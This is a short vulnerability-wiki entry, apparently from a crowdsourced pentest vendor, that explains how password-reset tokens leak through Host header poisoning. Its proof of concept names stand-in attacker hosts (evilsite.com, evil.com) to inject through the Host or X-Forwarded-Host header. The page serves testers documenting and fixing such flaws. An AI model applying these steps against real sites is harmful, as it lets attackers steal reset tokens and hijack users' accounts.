Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V4 - Access Control

Weak Password Reset Implementation - Token Leakage via Host Header Poisoning

POC

1) Click on reset the password on the application 2) Intercept the HTTP request in Burp Suite 3) Change the Host field to www.evilsite.com 4) If step 3 doesn’t work out then add a new header X-Forwarded-Host: evil.com in the request. 5) The user will get a link like http://evil.com/reset_password/token when they click on it, and the attacker receive the reset password token and hijack the user account

Impact

High

Likelihood

High